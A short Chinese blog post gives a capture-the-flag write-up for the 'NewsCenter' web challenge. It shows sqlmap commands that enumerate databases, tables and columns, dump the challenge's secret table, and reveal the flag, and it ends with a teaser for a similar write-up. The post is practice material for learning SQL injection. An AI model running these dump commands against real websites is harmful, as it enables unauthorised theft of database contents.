NewsCenter

时间：2023-11-07 11:01:09浏览次数：23

标签：sqlmap test1 NewsCenter -- py news txt

打开界面有一个搜索框

抓包查看是post形式提交的数据包

这时候试试sql注入，万能密码直接全都显示，那就说明存在sql注入漏洞

这里试试用sqlmap自动注入试试（POST类型的sql注入第一次尝试）

sqlmap.py -r test1.txt --dbs

sqlmap.py -r test1.txt -D news --tables

sqlmap.py -r test1.txt -D news -T secret_table --columns

sqlmap.py -r test1.txt -D news -T secret_table -C "fl4g" --dump

得到flag：QCTF{sq1_inJec7ion_ezzz}

或者直接一步到位把整个数据库的字段爆出来

sqlmap.py -r test1.txt -D news --dump

标签：sqlmap,test1,NewsCenter,--,py,news,txt
From： https://www.cnblogs.com/lhqrusht0p/p/17814544.html

CTFer成长记录——CTF之Web专题·攻防世界—NewsCenter
一、题目链接https://adworld.xctf.org.cn/challenges/list二、解法步骤本题打开是让我们搜新闻，新闻的数据就是来自于数据库的，那么比较容易想到这题应该是sql注入。首先判断是否能单引号绕过：输入hello正常回显，但hello'，发现页面空白，说明hello'会报错，且报错无回显......